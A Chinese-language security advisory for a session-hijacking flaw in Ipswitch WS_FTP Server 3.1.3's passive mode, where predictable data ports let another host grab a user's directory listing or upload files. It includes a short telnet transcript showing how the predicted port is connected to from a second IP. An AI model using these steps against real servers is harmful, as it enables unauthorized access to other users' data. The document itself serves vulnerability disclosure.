发布日期：2002-10-25
更新日期：2002-10-31

受影响系统：
Ipswitch WS FTP Server 3.1.3
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 6051

Ipswitch WS_FTP Server是一款适用于Microsoft Windows操作系统下的FTP服务程序。

WS_FTP Server被动模式中存在会话劫持问题，远程攻击者可以利用这个漏洞利用获得目录列表、文件信息等内容。

WS_FTP Server存在会话劫持漏洞，当由用户发起被动连接时，由于FTP服务器打开的端口可预测，其他用户可以通过连接FTP服务器打开的端口，访问合法用户的会话，导致泄露任意信息、包括目录列表、文件信息、或者上载文件等。

<*来源：Gregory A Lundberg & Jeffrey R. Gerber （lowhalo@hushmail.com）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103556238723400&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

在某一个主机上进行FTP连接：

$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing

然后，再从其他IP发起连接：

$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 .
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 ..
- -rwxr-x--- 1 lowhalo System 1337 Jan 0 00:00 lh
Connection closed by foreign host.

建议：
--------------------------------------------------------------------------------
厂商补丁：

Ipswitch
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：